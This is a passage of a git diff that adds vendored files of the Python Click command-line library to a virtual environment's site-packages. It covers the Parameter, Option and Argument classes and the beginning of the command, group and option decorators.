+ if self.metavar is not None: + return self.metavar + + metavar = self.type.get_metavar(self) + + if metavar is None: + metavar = self.type.name.upper() + + if self.nargs != 1: + metavar += "..." + + return metavar + + @t.overload + def get_default( + self, ctx: Context, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def get_default( + self, ctx: Context, call: bool = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def get_default( + self, ctx: Context, call: bool = True + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + """Get the default for the parameter. Tries + :meth:`Context.lookup_default` first, then the local default. + + :param ctx: Current context. + :param call: If the default is a callable, call it. Disable to + return the callable instead. + + .. versionchanged:: 8.0.2 + Type casting is no longer performed when getting a default. + + .. versionchanged:: 8.0.1 + Type casting can fail in resilient parsing mode. Invalid + defaults will not prevent showing help text. + + .. versionchanged:: 8.0 + Looks at ``ctx.default_map`` first. + + .. versionchanged:: 8.0 + Added the ``call`` parameter. + """ + value = ctx.lookup_default(self.name, call=False) # type: ignore + + if value is None: + value = self.default + + if call and callable(value): + value = value() + + return value + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + raise NotImplementedError() + + def consume_value( + self, ctx: Context, opts: t.Mapping[str, t.Any] + ) -> t.Tuple[t.Any, ParameterSource]: + value = opts.get(self.name) # type: ignore + source = ParameterSource.COMMANDLINE + + if value is None: + value = self.value_from_envvar(ctx) + source = ParameterSource.ENVIRONMENT + + if value is None: + value = ctx.lookup_default(self.name) # type: ignore + source = ParameterSource.DEFAULT_MAP + + if value is None: + value = self.get_default(ctx) + source = ParameterSource.DEFAULT + + return value, source + + def type_cast_value(self, ctx: Context, value: t.Any) -> t.Any: + """Convert and validate a value against the option's + :attr:`type`, :attr:`multiple`, and :attr:`nargs`. + """ + if value is None: + return () if self.multiple or self.nargs == -1 else None + + def check_iter(value: t.Any) -> t.Iterator[t.Any]: + try: + return _check_iter(value) + except TypeError: + # This should only happen when passing in args manually, + # the parser should construct an iterable when parsing + # the command line. + raise BadParameter( + _("Value must be an iterable."), ctx=ctx, param=self + ) from None + + if self.nargs == 1 or self.type.is_composite: + + def convert(value: t.Any) -> t.Any: + return self.type(value, param=self, ctx=ctx) + + elif self.nargs == -1: + + def convert(value: t.Any) -> t.Any: # t.Tuple[t.Any, ...] + return tuple(self.type(x, self, ctx) for x in check_iter(value)) + + else: # nargs > 1 + + def convert(value: t.Any) -> t.Any: # t.Tuple[t.Any, ...] + value = tuple(check_iter(value)) + + if len(value) != self.nargs: + raise BadParameter( + ngettext( + "Takes {nargs} values but 1 was given.", + "Takes {nargs} values but {len} were given.", + len(value), + ).format(nargs=self.nargs, len=len(value)), + ctx=ctx, + param=self, + ) + + return tuple(self.type(x, self, ctx) for x in value) + + if self.multiple: + return tuple(convert(x) for x in check_iter(value)) + + return convert(value) + + def value_is_missing(self, value: t.Any) -> bool: + if value is None: + return True + + if (self.nargs != 1 or self.multiple) and value == (): + return True + + return False + + def process_value(self, ctx: Context, value: t.Any) -> t.Any: + value = self.type_cast_value(ctx, value) + + if self.required and self.value_is_missing(value): + raise MissingParameter(ctx=ctx, param=self) + + if self.callback is not None: + value = self.callback(ctx, self, value) + + return value + + def resolve_envvar_value(self, ctx: Context) -> t.Optional[str]: + if self.envvar is None: + return None + + if isinstance(self.envvar, str): + rv = os.environ.get(self.envvar) + + if rv: + return rv + else: + for envvar in self.envvar: + rv = os.environ.get(envvar) + + if rv: + return rv + + return None + + def value_from_envvar(self, ctx: Context) -> t.Optional[t.Any]: + rv: t.Optional[t.Any] = self.resolve_envvar_value(ctx) + + if rv is not None and self.nargs != 1: + rv = self.type.split_envvar_value(rv) + + return rv + + def handle_parse_result( + self, ctx: Context, opts: t.Mapping[str, t.Any], args: t.List[str] + ) -> t.Tuple[t.Any, t.List[str]]: + with augment_usage_errors(ctx, param=self): + value, source = self.consume_value(ctx, opts) + ctx.set_parameter_source(self.name, source) # type: ignore + + try: + value = self.process_value(ctx, value) + except Exception: + if not ctx.resilient_parsing: + raise + + value = None + + if self.expose_value: + ctx.params[self.name] = value # type: ignore + + return value, args + + def get_help_record(self, ctx: Context) -> t.Optional[t.Tuple[str, str]]: + pass + + def get_usage_pieces(self, ctx: Context) -> t.List[str]: + return [] + + def get_error_hint(self, ctx: Context) -> str: + """Get a stringified version of the param for use in error messages to + indicate which param caused the error. + """ + hint_list = self.opts or [self.human_readable_name] + return " / ".join(f"'{x}'" for x in hint_list) + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. If a + ``shell_complete`` function was given during init, it is used. + Otherwise, the :attr:`type` + :meth:`~click.types.ParamType.shell_complete` function is used. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + if self._custom_shell_complete is not None: + results = self._custom_shell_complete(ctx, self, incomplete) + + if results and isinstance(results[0], str): + from click.shell_completion import CompletionItem + + results = [CompletionItem(c) for c in results] + + return t.cast(t.List["CompletionItem"], results) + + return self.type.shell_complete(ctx, self, incomplete) + + +class Option(Parameter): + """Options are usually optional values on the command line and + have some extra features that arguments don't have. + + All other parameters are passed onwards to the parameter constructor. + + :param show_default: Show the default value for this option in its + help text. Values are not shown by default, unless + :attr:`Context.show_default` is ``True``. If this value is a + string, it shows that string in parentheses instead of the + actual value. This is particularly useful for dynamic options. + For single option boolean flags, the default remains hidden if + its value is ``False``. + :param show_envvar: Controls if an environment variable should be + shown on the help page. Normally, environment variables are not + shown. + :param prompt: If set to ``True`` or a non empty string then the + user will be prompted for input. If set to ``True`` the prompt + will be the option name capitalized. + :param confirmation_prompt: Prompt a second time to confirm the + value if it was prompted for. Can be set to a string instead of + ``True`` to customize the message. + :param prompt_required: If set to ``False``, the user will be + prompted for input only when the option was specified as a flag + without a value. + :param hide_input: If this is ``True`` then the input on the prompt + will be hidden from the user. This is useful for password input. + :param is_flag: forces this option to act as a flag. The default is + auto detection. + :param flag_value: which value should be used for this flag if it's + enabled. This is set to a boolean automatically if + the option string contains a slash to mark two options. + :param multiple: if this is set to `True` then the argument is accepted + multiple times and recorded. This is similar to ``nargs`` + in how it works but supports arbitrary number of + arguments. + :param count: this flag makes an option increment an integer. + :param allow_from_autoenv: if this is enabled then the value of this + parameter will be pulled from an environment + variable in case a prefix is defined on the + context. + :param help: the help string. + :param hidden: hide this option from help outputs. + :param attrs: Other command arguments described in :class:`Parameter`. + + .. versionchanged:: 8.1.0 + Help text indentation is cleaned here instead of only in the + ``@option`` decorator. + + .. versionchanged:: 8.1.0 + The ``show_default`` parameter overrides + ``Context.show_default``. + + .. versionchanged:: 8.1.0 + The default of a single option boolean flag is not shown if the + default value is ``False``. + + .. versionchanged:: 8.0.1 + ``type`` is detected from ``flag_value`` if given. + """ + + param_type_name = "option" + + def __init__( + self, + param_decls: t.Optional[t.Sequence[str]] = None, + show_default: t.Union[bool, str, None] = None, + prompt: t.Union[bool, str] = False, + confirmation_prompt: t.Union[bool, str] = False, + prompt_required: bool = True, + hide_input: bool = False, + is_flag: t.Optional[bool] = None, + flag_value: t.Optional[t.Any] = None, + multiple: bool = False, + count: bool = False, + allow_from_autoenv: bool = True, + type: t.Optional[t.Union[types.ParamType, t.Any]] = None, + help: t.Optional[str] = None, + hidden: bool = False, + show_choices: bool = True, + show_envvar: bool = False, + **attrs: t.Any, + ) -> None: + if help: + help = inspect.cleandoc(help) + + default_is_missing = "default" not in attrs + super().__init__(param_decls, type=type, multiple=multiple, **attrs) + + if prompt is True: + if self.name is None: + raise TypeError("'name' is required with 'prompt=True'.") + + prompt_text: t.Optional[str] = self.name.replace("_", " ").capitalize() + elif prompt is False: + prompt_text = None + else: + prompt_text = prompt + + self.prompt = prompt_text + self.confirmation_prompt = confirmation_prompt + self.prompt_required = prompt_required + self.hide_input = hide_input + self.hidden = hidden + + # If prompt is enabled but not required, then the option can be + # used as a flag to indicate using prompt or flag_value. + self._flag_needs_value = self.prompt is not None and not self.prompt_required + + if is_flag is None: + if flag_value is not None: + # Implicitly a flag because flag_value was set. + is_flag = True + elif self._flag_needs_value: + # Not a flag, but when used as a flag it shows a prompt. + is_flag = False + else: + # Implicitly a flag because flag options were given. + is_flag = bool(self.secondary_opts) + elif is_flag is False and not self._flag_needs_value: + # Not a flag, and prompt is not enabled, can be used as a + # flag if flag_value is set. + self._flag_needs_value = flag_value is not None + + self.default: t.Union[t.Any, t.Callable[[], t.Any]] + + if is_flag and default_is_missing and not self.required: + if multiple: + self.default = () + else: + self.default = False + + if flag_value is None: + flag_value = not self.default + + self.type: types.ParamType + if is_flag and type is None: + # Re-guess the type from the flag value instead of the + # default. + self.type = types.convert_type(None, flag_value) + + self.is_flag: bool = is_flag + self.is_bool_flag: bool = is_flag and isinstance(self.type, types.BoolParamType) + self.flag_value: t.Any = flag_value + + # Counting + self.count = count + if count: + if type is None: + self.type = types.IntRange(min=0) + if default_is_missing: + self.default = 0 + + self.allow_from_autoenv = allow_from_autoenv + self.help = help + self.show_default = show_default + self.show_choices = show_choices + self.show_envvar = show_envvar + + if __debug__: + if self.nargs == -1: + raise TypeError("nargs=-1 is not supported for options.") + + if self.prompt and self.is_flag and not self.is_bool_flag: + raise TypeError("'prompt' is not valid for non-boolean flag.") + + if not self.is_bool_flag and self.secondary_opts: + raise TypeError("Secondary flag is not valid for non-boolean flag.") + + if self.is_bool_flag and self.hide_input and self.prompt is not None: + raise TypeError( + "'prompt' with 'hide_input' is not valid for boolean flag." + ) + + if self.count: + if self.multiple: + raise TypeError("'count' is not valid with 'multiple'.") + + if self.is_flag: + raise TypeError("'count' is not valid with 'is_flag'.") + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + help=self.help, + prompt=self.prompt, + is_flag=self.is_flag, + flag_value=self.flag_value, + count=self.count, + hidden=self.hidden, + ) + return info_dict + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + opts = [] + secondary_opts = [] + name = None + possible_names = [] + + for decl in decls: + if decl.isidentifier(): + if name is not None: + raise TypeError(f"Name '{name}' defined twice") + name = decl + else: + split_char = ";" if decl[:1] == "/" else "/" + if split_char in decl: + first, second = decl.split(split_char, 1) + first = first.rstrip() + if first: + possible_names.append(split_opt(first)) + opts.append(first) + second = second.lstrip() + if second: + secondary_opts.append(second.lstrip()) + if first == second: + raise ValueError( + f"Boolean option {decl!r} cannot use the" + " same flag for true/false." + ) + else: + possible_names.append(split_opt(decl)) + opts.append(decl) + + if name is None and possible_names: + possible_names.sort(key=lambda x: -len(x[0])) # group long options first + name = possible_names[0][1].replace("-", "_").lower() + if not name.isidentifier(): + name = None + + if name is None: + if not expose_value: + return None, opts, secondary_opts + raise TypeError("Could not determine name for option") + + if not opts and not secondary_opts: + raise TypeError( + f"No options defined but a name was passed ({name})." + " Did you mean to declare an argument instead? Did" + f" you mean to pass '--{name}'?" + ) + + return name, opts, secondary_opts + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + if self.multiple: + action = "append" + elif self.count: + action = "count" + else: + action = "store" + + if self.is_flag: + action = f"{action}_const" + + if self.is_bool_flag and self.secondary_opts: + parser.add_option( + obj=self, opts=self.opts, dest=self.name, action=action, const=True + ) + parser.add_option( + obj=self, + opts=self.secondary_opts, + dest=self.name, + action=action, + const=False, + ) + else: + parser.add_option( + obj=self, + opts=self.opts, + dest=self.name, + action=action, + const=self.flag_value, + ) + else: + parser.add_option( + obj=self, + opts=self.opts, + dest=self.name, + action=action, + nargs=self.nargs, + ) + + def get_help_record(self, ctx: Context) -> t.Optional[t.Tuple[str, str]]: + if self.hidden: + return None + + any_prefix_is_slash = False + + def _write_opts(opts: t.Sequence[str]) -> str: + nonlocal any_prefix_is_slash + + rv, any_slashes = join_options(opts) + + if any_slashes: + any_prefix_is_slash = True + + if not self.is_flag and not self.count: + rv += f" {self.make_metavar()}" + + return rv + + rv = [_write_opts(self.opts)] + + if self.secondary_opts: + rv.append(_write_opts(self.secondary_opts)) + + help = self.help or "" + extra = [] + + if self.show_envvar: + envvar = self.envvar + + if envvar is None: + if ( + self.allow_from_autoenv + and ctx.auto_envvar_prefix is not None + and self.name is not None + ): + envvar = f"{ctx.auto_envvar_prefix}_{self.name.upper()}" + + if envvar is not None: + var_str = ( + envvar + if isinstance(envvar, str) + else ", ".join(str(d) for d in envvar) + ) + extra.append(_("env var: {var}").format(var=var_str)) + + # Temporarily enable resilient parsing to avoid type casting + # failing for the default. Might be possible to extend this to + # help formatting in general. + resilient = ctx.resilient_parsing + ctx.resilient_parsing = True + + try: + default_value = self.get_default(ctx, call=False) + finally: + ctx.resilient_parsing = resilient + + show_default = False + show_default_is_str = False + + if self.show_default is not None: + if isinstance(self.show_default, str): + show_default_is_str = show_default = True + else: + show_default = self.show_default + elif ctx.show_default is not None: + show_default = ctx.show_default + + if show_default_is_str or (show_default and (default_value is not None)): + if show_default_is_str: + default_string = f"({self.show_default})" + elif isinstance(default_value, (list, tuple)): + default_string = ", ".join(str(d) for d in default_value) + elif inspect.isfunction(default_value): + default_string = _("(dynamic)") + elif self.is_bool_flag and self.secondary_opts: + # For boolean flags that have distinct True/False opts, + # use the opt without prefix instead of the value. + default_string = split_opt( + (self.opts if self.default else self.secondary_opts)[0] + )[1] + elif self.is_bool_flag and not self.secondary_opts and not default_value: + default_string = "" + else: + default_string = str(default_value) + + if default_string: + extra.append(_("default: {default}").format(default=default_string)) + + if ( + isinstance(self.type, types._NumberRangeBase) + # skip count with default range type + and not (self.count and self.type.min == 0 and self.type.max is None) + ): + range_str = self.type._describe_range() + + if range_str: + extra.append(range_str) + + if self.required: + extra.append(_("required")) + + if extra: + extra_str = "; ".join(extra) + help = f"{help} [{extra_str}]" if help else f"[{extra_str}]" + + return ("; " if any_prefix_is_slash else " / ").join(rv), help + + @t.overload + def get_default( + self, ctx: Context, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def get_default( + self, ctx: Context, call: bool = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def get_default( + self, ctx: Context, call: bool = True + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + # If we're a non boolean flag our default is more complex because + # we need to look at all flags in the same group to figure out + # if we're the default one in which case we return the flag + # value as default. + if self.is_flag and not self.is_bool_flag: + for param in ctx.command.params: + if param.name == self.name and param.default: + return t.cast(Option, param).flag_value + + return None + + return super().get_default(ctx, call=call) + + def prompt_for_value(self, ctx: Context) -> t.Any: + """This is an alternative flow that can be activated in the full + value processing if a value does not exist. It will prompt the + user until a valid value exists and then returns the processed + value as result. + """ + assert self.prompt is not None + + # Calculate the default before prompting anything to be stable. + default = self.get_default(ctx) + + # If this is a prompt for a flag we need to handle this + # differently. + if self.is_bool_flag: + return confirm(self.prompt, default) + + return prompt( + self.prompt, + default=default, + type=self.type, + hide_input=self.hide_input, + show_choices=self.show_choices, + confirmation_prompt=self.confirmation_prompt, + value_proc=lambda x: self.process_value(ctx, x), + ) + + def resolve_envvar_value(self, ctx: Context) -> t.Optional[str]: + rv = super().resolve_envvar_value(ctx) + + if rv is not None: + return rv + + if ( + self.allow_from_autoenv + and ctx.auto_envvar_prefix is not None + and self.name is not None + ): + envvar = f"{ctx.auto_envvar_prefix}_{self.name.upper()}" + rv = os.environ.get(envvar) + + if rv: + return rv + + return None + + def value_from_envvar(self, ctx: Context) -> t.Optional[t.Any]: + rv: t.Optional[t.Any] = self.resolve_envvar_value(ctx) + + if rv is None: + return None + + value_depth = (self.nargs != 1) + bool(self.multiple) + + if value_depth > 0: + rv = self.type.split_envvar_value(rv) + + if self.multiple and self.nargs != 1: + rv = batch(rv, self.nargs) + + return rv + + def consume_value( + self, ctx: Context, opts: t.Mapping[str, "Parameter"] + ) -> t.Tuple[t.Any, ParameterSource]: + value, source = super().consume_value(ctx, opts) + + # The parser will emit a sentinel value if the option can be + # given as a flag without a value. This is different from None + # to distinguish from the flag not being given at all. + if value is _flag_needs_value: + if self.prompt is not None and not ctx.resilient_parsing: + value = self.prompt_for_value(ctx) + source = ParameterSource.PROMPT + else: + value = self.flag_value + source = ParameterSource.COMMANDLINE + + elif ( + self.multiple + and value is not None + and any(v is _flag_needs_value for v in value) + ): + value = [self.flag_value if v is _flag_needs_value else v for v in value] + source = ParameterSource.COMMANDLINE + + # The value wasn't set, or used the param's default, prompt if + # prompting is enabled. + elif ( + source in {None, ParameterSource.DEFAULT} + and self.prompt is not None + and (self.required or self.prompt_required) + and not ctx.resilient_parsing + ): + value = self.prompt_for_value(ctx) + source = ParameterSource.PROMPT + + return value, source + + +class Argument(Parameter): + """Arguments are positional parameters to a command. They generally + provide fewer features than options but can have infinite ``nargs`` + and are required by default. + + All parameters are passed onwards to the constructor of :class:`Parameter`. + """ + + param_type_name = "argument" + + def __init__( + self, + param_decls: t.Sequence[str], + required: t.Optional[bool] = None, + **attrs: t.Any, + ) -> None: + if required is None: + if attrs.get("default") is not None: + required = False + else: + required = attrs.get("nargs", 1) > 0 + + if "multiple" in attrs: + raise TypeError("__init__() got an unexpected keyword argument 'multiple'.") + + super().__init__(param_decls, required=required, **attrs) + + if __debug__: + if self.default is not None and self.nargs == -1: + raise TypeError("'default' is not supported for nargs=-1.") + + @property + def human_readable_name(self) -> str: + if self.metavar is not None: + return self.metavar + return self.name.upper() # type: ignore + + def make_metavar(self) -> str: + if self.metavar is not None: + return self.metavar + var = self.type.get_metavar(self) + if not var: + var = self.name.upper() # type: ignore + if not self.required: + var = f"[{var}]" + if self.nargs != 1: + var += "..." + return var + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + if not decls: + if not expose_value: + return None, [], [] + raise TypeError("Could not determine name for argument") + if len(decls) == 1: + name = arg = decls[0] + name = name.replace("-", "_").lower() + else: + raise TypeError( + "Arguments take exactly one parameter declaration, got" + f" {len(decls)}." + ) + return name, [arg], [] + + def get_usage_pieces(self, ctx: Context) -> t.List[str]: + return [self.make_metavar()] + + def get_error_hint(self, ctx: Context) -> str: + return f"'{self.make_metavar()}'" + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + parser.add_argument(dest=self.name, nargs=self.nargs, obj=self) diff --git a/env/Lib/site-packages/click/decorators.py b/env/Lib/site-packages/click/decorators.py new file mode 100644 index 00000000..d9bba950 --- /dev/null +++ b/env/Lib/site-packages/click/decorators.py @@ -0,0 +1,561 @@ +import inspect +import types +import typing as t +from functools import update_wrapper +from gettext import gettext as _ + +from .core import Argument +from .core import Command +from .core import Context +from .core import Group +from .core import Option +from .core import Parameter +from .globals import get_current_context +from .utils import echo + +if t.TYPE_CHECKING: + import typing_extensions as te + + P = te.ParamSpec("P") + +R = t.TypeVar("R") +T = t.TypeVar("T") +_AnyCallable = t.Callable[..., t.Any] +FC = t.TypeVar("FC", bound=t.Union[_AnyCallable, Command]) + + +def pass_context(f: "t.Callable[te.Concatenate[Context, P], R]") -> "t.Callable[P, R]": + """Marks a callback as wanting to receive the current context + object as first argument. + """ + + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + return f(get_current_context(), *args, **kwargs) + + return update_wrapper(new_func, f) + + +def pass_obj(f: "t.Callable[te.Concatenate[t.Any, P], R]") -> "t.Callable[P, R]": + """Similar to :func:`pass_context`, but only pass the object on the + context onwards (:attr:`Context.obj`). This is useful if that object + represents the state of a nested system. + """ + + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + return f(get_current_context().obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + +def make_pass_decorator( + object_type: t.Type[T], ensure: bool = False +) -> t.Callable[["t.Callable[te.Concatenate[T, P], R]"], "t.Callable[P, R]"]: + """Given an object type this creates a decorator that will work + similar to :func:`pass_obj` but instead of passing the object of the + current context, it will find the innermost context of type + :func:`object_type`. + + This generates a decorator that works roughly like this:: + + from functools import update_wrapper + + def decorator(f): + @pass_context + def new_func(ctx, *args, **kwargs): + obj = ctx.find_object(object_type) + return ctx.invoke(f, obj, *args, **kwargs) + return update_wrapper(new_func, f) + return decorator + + :param object_type: the type of the object to pass. + :param ensure: if set to `True`, a new object will be created and + remembered on the context if it's not there yet. + """ + + def decorator(f: "t.Callable[te.Concatenate[T, P], R]") -> "t.Callable[P, R]": + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + ctx = get_current_context() + + obj: t.Optional[T] + if ensure: + obj = ctx.ensure_object(object_type) + else: + obj = ctx.find_object(object_type) + + if obj is None: + raise RuntimeError( + "Managed to invoke callback without a context" + f" object of type {object_type.__name__!r}" + " existing." + ) + + return ctx.invoke(f, obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + return decorator # type: ignore[return-value] + + +def pass_meta_key( + key: str, *, doc_description: t.Optional[str] = None +) -> "t.Callable[[t.Callable[te.Concatenate[t.Any, P], R]], t.Callable[P, R]]": + """Create a decorator that passes a key from + :attr:`click.Context.meta` as the first argument to the decorated + function. + + :param key: Key in ``Context.meta`` to pass. + :param doc_description: Description of the object being passed, + inserted into the decorator's docstring. Defaults to "the 'key' + key from Context.meta". + + .. versionadded:: 8.0 + """ + + def decorator(f: "t.Callable[te.Concatenate[t.Any, P], R]") -> "t.Callable[P, R]": + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> R: + ctx = get_current_context() + obj = ctx.meta[key] + return ctx.invoke(f, obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + if doc_description is None: + doc_description = f"the {key!r} key from :attr:`click.Context.meta`" + + decorator.__doc__ = ( + f"Decorator that passes {doc_description} as the first argument" + " to the decorated function." + ) + return decorator # type: ignore[return-value] + + +CmdType = t.TypeVar("CmdType", bound=Command) + + +# variant: no call, directly as decorator for a function. +@t.overload +def command(name: _AnyCallable) -> Command: + ... + + +# variant: with positional name and with positional or keyword cls argument: +# @command(namearg, CommandCls, ...) or @command(namearg, cls=CommandCls, ...) +@t.overload +def command( + name: t.Optional[str], + cls: t.Type[CmdType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], CmdType]: + ... + + +# variant: name omitted, cls _must_ be a keyword argument, @command(cls=CommandCls, ...) +@t.overload +def command( + name: None = None, + *, + cls: t.Type[CmdType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], CmdType]: + ... + + +# variant: with optional string name, no cls argument provided. +@t.overload +def command( + name: t.Optional[str] = ..., cls: None = None, **attrs: t.Any +) -> t.Callable[[_AnyCallable], Command]: + ... + + +def command( + name: t.Union[t.Optional[str], _AnyCallable] = None, + cls: t.Optional[t.Type[CmdType]] = None, + **attrs: t.Any, +) -> t.Union[Command, t.Callable[[_AnyCallable], t.Union[Command, CmdType]]]: + r"""Creates a new :class:`Command` and uses the decorated function as + callback. This will also automatically attach all decorated + :func:`option`\s and :func:`argument`\s as parameters to the command. + + The name of the command defaults to the name of the function with + underscores replaced by dashes. If you want to change that, you can + pass the intended name as the first argument. + + All keyword arguments are forwarded to the underlying command class. + For the ``params`` argument, any decorated params are appended to + the end of the list. + + Once decorated the function turns into a :class:`Command` instance + that can be invoked as a command line utility or be attached to a + command :class:`Group`. + + :param name: the name of the command. This defaults to the function + name with underscores replaced by dashes. + :param cls: the command class to instantiate. This defaults to + :class:`Command`. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.1 + The ``params`` argument can be used. Decorated params are + appended to the end of the list. + """ + + func: t.Optional[t.Callable[[_AnyCallable], t.Any]] = None + + if callable(name): + func = name + name = None + assert cls is None, "Use 'command(cls=cls)(callable)' to specify a class." + assert not attrs, "Use 'command(**kwargs)(callable)' to provide arguments." + + if cls is None: + cls = t.cast(t.Type[CmdType], Command) + + def decorator(f: _AnyCallable) -> CmdType: + if isinstance(f, Command): + raise TypeError("Attempted to convert a callback into a command twice.") + + attr_params = attrs.pop("params", None) + params = attr_params if attr_params is not None else [] + + try: + decorator_params = f.__click_params__ # type: ignore + except AttributeError: + pass + else: + del f.__click_params__ # type: ignore + params.extend(reversed(decorator_params)) + + if attrs.get("help") is None: + attrs["help"] = f.__doc__ + + if t.TYPE_CHECKING: + assert cls is not None + assert not callable(name) + + cmd = cls( + name=name or f.__name__.lower().replace("_", "-"), + callback=f, + params=params, + **attrs, + ) + cmd.__doc__ = f.__doc__ + return cmd + + if func is not None: + return decorator(func) + + return decorator + + +GrpType = t.TypeVar("GrpType", bound=Group) + + +# variant: no call, directly as decorator for a function. +@t.overload +def group(name: _AnyCallable) -> Group: + ... + + +# variant: with positional name and with positional or keyword cls argument: +# @group(namearg, GroupCls, ...) or @group(namearg, cls=GroupCls, ...) +@t.overload +def group( + name: t.Optional[str], + cls: t.Type[GrpType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], GrpType]: + ... + + +# variant: name omitted, cls _must_ be a keyword argument, @group(cmd=GroupCls, ...) +@t.overload +def group( + name: None = None, + *, + cls: t.Type[GrpType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], GrpType]: + ... + + +# variant: with optional string name, no cls argument provided. +@t.overload +def group( + name: t.Optional[str] = ..., cls: None = None, **attrs: t.Any +) -> t.Callable[[_AnyCallable], Group]: + ... + + +def group( + name: t.Union[str, _AnyCallable, None] = None, + cls: t.Optional[t.Type[GrpType]] = None, + **attrs: t.Any, +) -> t.Union[Group, t.Callable[[_AnyCallable], t.Union[Group, GrpType]]]: + """Creates a new :class:`Group` with a function as callback. This + works otherwise the same as :func:`command` just that the `cls` + parameter is set to :class:`Group`. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + """ + if cls is None: + cls = t.cast(t.Type[GrpType], Group) + + if callable(name): + return command(cls=cls, **attrs)(name) + + return command(name, cls, **attrs) + + +def _param_memo(f: t.Callable[..., t.Any], param: Parameter) -> None: + if isinstance(f, Command): + f.params.append(param) + else: + if not hasattr(f, "__click_params__"): + f.__click_params__ = [] # type: ignore + + f.__click_params__.append(param) # type: ignore + + +def argument( + *param_decls: str, cls: t.Optional[t.Type[Argument]] = None, **attrs: t.Any +) -> t.Callable[[FC], FC]: + """Attaches an argument to the command. All positional arguments are + passed as parameter declarations to :class:`Argument`; all keyword + arguments are forwarded unchanged (except ``cls``). + This is equivalent to creating an :class:`Argument` instance manually + and attaching it to the :attr:`Command.params` list. + + For the default argument class, refer to :class:`Argument` and + :class:`Parameter` for descriptions of parameters. + + :param cls: the argument class to instantiate. This defaults to + :class:`Argument`. + :param param_decls: Passed as positional arguments to the constructor of + ``cls``. + :param attrs: Passed as keyword arguments to the constructor of ``cls``. + """ + if cls is None: + cls = Argument + + def decorator(f: FC) -> FC: + _param_memo(f, cls(param_decls, **attrs)) + return f + + return decorator + + +def option( + *param_decls: str, cls: t.Optional[t.Type[Option]] = None, **attrs: t.Any +) -> t.Callable[[FC], FC]: + """Attaches an option to the command. All positional arguments are + passed as parameter declarations to :class:`Option`; all keyword + arguments are forwarded unchanged (except ``cls``). + This is equivalent to creating an :class:`Option` instance manually + and attaching it to the :attr:`Command.params` list. + + For the default option class, refer to :class:`Option` and + :class:`Parameter` for descriptions of parameters. + + :param cls: the option class to instantiate. This defaults to + :class:`Option`. + :param param_decls: Passed as positional arguments to the constructor of + ``cls``. + :param attrs: Passed as keyword arguments to the constructor of ``cls``. + """ + if cls is None: + cls = Option + + def decorator(f: FC) -> FC: + _param_memo(f, cls(param_decls, **attrs)) + return f + + return decorator + + +def confirmation_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--yes`` option which shows a prompt before continuing if + not passed. If the prompt is declined, the program will exit. + + :param param_decls: One or more option names. Defaults to the single + value ``"--yes"``. + :param kwargs: Extra arguments are passed to :func:`option`. + """ + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value: + ctx.abort() + + if not param_decls: + param_decls = ("--yes",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("callback", callback) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("prompt", "Do you want to continue?") + kwargs.setdefault("help", "Confirm the action without prompting.") + return option(*param_decls, **kwargs) + + +def password_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--password`` option which prompts for a password, hiding + input and asking to enter the value again for confirmation. + + :param param_decls: One or more option names. Defaults to the single + value ``"--password"``. + :param kwargs: Extra arguments are passed to :func:`option`. + """ + if not param_decls: + param_decls = ("--password",) + + kwargs.setdefault("prompt", True) + kwargs.setdefault("confirmation_prompt", True) + kwargs.setdefault("hide_input", True) + return option(*param_decls, **kwargs) + + +def version_option( + version: t.Optional[str] = None, + *param_decls: str, + package_name: t.Optional[str] = None, + prog_name: t.Optional[str] = None, + message: t.Optional[str] = None, + **kwargs: t.Any, +) -> t.Callable[[FC], FC]: + """Add a ``--version`` option which immediately prints the version + number and exits the program. + + If ``version`` is not provided, Click will try to detect it using + :func:`importlib.metadata.version` to get the version for the + ``package_name``. On Python < 3.8, the ``importlib_metadata`` + backport must be installed. + + If ``package_name`` is not provided, Click will try to detect it by + inspecting the stack frames. This will be used to detect the + version, so it must match the name of the installed package. + + :param version: The version number to show. If not provided, Click + will try to detect it. + :param param_decls: One or more option names. Defaults to the single + value ``"--version"``. + :param package_name: The package name to detect the version from. If + not provided, Click will try to detect it. + :param prog_name: The name of the CLI to show in the message. If not + provided, it will be detected from the command. + :param message: The message to show. The values ``%(prog)s``, + ``%(package)s``, and ``%(version)s`` are available. Defaults to + ``"%(prog)s, version %(version)s"``. + :param kwargs: Extra arguments are passed to :func:`option`. + :raise RuntimeError: ``version`` could not be detected. + + .. versionchanged:: 8.0 + Add the ``package_name`` parameter, 